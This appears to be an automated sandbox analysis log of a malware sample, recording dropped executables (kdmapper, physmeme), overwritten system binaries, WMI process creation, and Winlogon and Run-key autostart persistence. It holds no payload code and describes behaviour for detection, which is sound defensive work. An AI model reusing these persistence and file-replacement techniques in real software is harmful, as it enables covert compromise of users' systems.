Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb66 source: NCTSgL4t0B.exe
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.pdb source: msedge.exe, 00000017.00000002.1525602052.0000000002BEE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\sigmaclown\Desktop\Ghosty\build\usermode\usermode.pdb source: NCTSgL4t0B.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 0000000E.00000003.1324416558.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1323956983.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1324507313.000001EBAEA7D000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000E.00000003.1325126698.000001EBAEA20000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.14.dr

Source: NCTSgL4t0B.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: NCTSgL4t0B.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: NCTSgL4t0B.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: NCTSgL4t0B.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: NCTSgL4t0B.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline"	Jump to behavior
Source: C:\Edge\msedge.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline"	Jump to behavior

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Windows\Speech\kdmapper.exe

File created: C:\Edge\__tmp_rar_sfx_access_check_6779343

Jump to behavior

Source: kdmapper.exe.10.dr

Static PE information: section name: .didat

Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFF640 push ecx; ret	12_2_00DFF653
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFEB78 push eax; ret	12_2_00DFEB96
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00440905 push ecx; retf	19_2_00440906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 19_2_00452DD9 push eax; retf	19_2_004534E2
Source: C:\Edge\msedge.exe	Code function: 23_2_00007FFAAB794B92 pushad ; retf	23_2_00007FFAAB794B95
Source: C:\Edge\msedge.exe	Code function: 23_2_00007FFAABB88B28 push eax; ret	23_2_00007FFAABB88B29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFAAB69D2A5 pushad ; iretd	36_2_00007FFAAB69D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFAAB888DB0 pushad ; ret	36_2_00007FFAAB888DB1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 36_2_00007FFAAB882316 push 8B485F91h; iretd	36_2_00007FFAAB88231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_00007FFAAB66D2A5 pushad ; iretd	37_2_00007FFAAB66D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 37_2_00007FFAAB852316 push 8B485F94h; iretd	37_2_00007FFAAB85231B
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 40_2_00007FFAAB784B92 pushad ; retf	40_2_00007FFAAB784B95
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB794B92 pushad ; retf	41_2_00007FFAAB794B95
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A8AC3 push ss; iretd	41_2_00007FFAAB7A8AC9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7A967D push edi; ret	41_2_00007FFAAB7A9688
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 41_2_00007FFAAB7C7A05 push eax; iretd	41_2_00007FFAAB7C7A4D
Source: C:\Edge\msedge.exe	Code function: 42_2_00007FFAAB7A4B92 pushad ; retf	42_2_00007FFAAB7A4B95
Source: C:\Edge\msedge.exe	Code function: 42_2_00007FFAABB98B28 push eax; ret	42_2_00007FFAABB98B29
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A8AC3 push ss; iretd	43_2_00007FFAAB7A8AC9
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7A967D push edi; ret	43_2_00007FFAAB7A9688
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB794B92 pushad ; retf	43_2_00007FFAAB794B95
Source: C:\Edge\msedge.exe	Code function: 43_2_00007FFAAB7C7A05 push eax; iretd	43_2_00007FFAAB7C7A4D
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAAB774B92 pushad ; retf	49_2_00007FFAAB774B95
Source: C:\Edge\msedge.exe	Code function: 49_2_00007FFAABB68B28 push eax; ret	49_2_00007FFAABB68B29
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A8AC3 push ss; iretd	54_2_00007FFAAB7A8AC9
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7A967D push edi; ret	54_2_00007FFAAB7A9688
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB7C7A05 push eax; iretd	54_2_00007FFAAB7C7A4D
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAAB794B92 pushad ; retf	54_2_00007FFAAB794B95
Source: C:\Users\user\AppData\Local\Idle.exe	Code function: 54_2_00007FFAABB88B28 push eax; ret	54_2_00007FFAABB88B29

Source: msedge.exe.12.dr	Static PE information: section name: .text entropy: 7.556050087022216
Source: physmeme.exe.14.dr	Static PE information: section name: .text entropy: 7.9965850430662675
Source: Idle.exe.23.dr	Static PE information: section name: .text entropy: 7.556050087022216

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Edge\msedge.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Executable created and started: C:\Windows\Speech\physmeme.exe			Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Executable created and started: C:\Windows\Speech\kdmapper.exe			Jump to behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\NDQNJGxB.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\AwpzIjFt.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\LUAEjdyP.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\dgcKDzTe.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\NohnZlpE.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\tGwZoaKl.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\pGvBroyE.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\sharmiXk.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\YlsMudWZ.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\AppData\Local\Idle.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\CQuHWLcS.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\onyQOgMn.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\aUzlTMCV.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\MsCvKimq.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\YtKLaCEq.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\iZOTduyR.log	Jump to dropped file
Source: C:\Windows\Speech\kdmapper.exe	File created: C:\Edge\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\LAdenXtG.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\WjFdZuSe.log	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\BlhoAAti.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\iyHbCGSC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\PDYwKARr.log	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\kdmapper.exe	Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Windows\Speech\physmeme.exe	Jump to dropped file

Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\WjFdZuSe.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\onyQOgMn.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\YlsMudWZ.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\PDYwKARr.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\MsCvKimq.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\tGwZoaKl.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\CQuHWLcS.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\sharmiXk.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\iyHbCGSC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\aUzlTMCV.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\AwpzIjFt.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\YtKLaCEq.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\dgcKDzTe.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\LUAEjdyP.log	Jump to dropped file
Source: C:\Edge\msedge.exe	File created: C:\Users\user\Desktop\BlhoAAti.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\NohnZlpE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\pGvBroyE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\LAdenXtG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\iZOTduyR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	File created: C:\Users\user\Desktop\NDQNJGxB.log	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior
Source: C:\Edge\msedge.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell			Jump to behavior

Creates multiple autostart registry keys

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge			Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle			Jump to behavior

Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior
Source: C:\Edge\msedge.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msedge	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\kdmapper.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
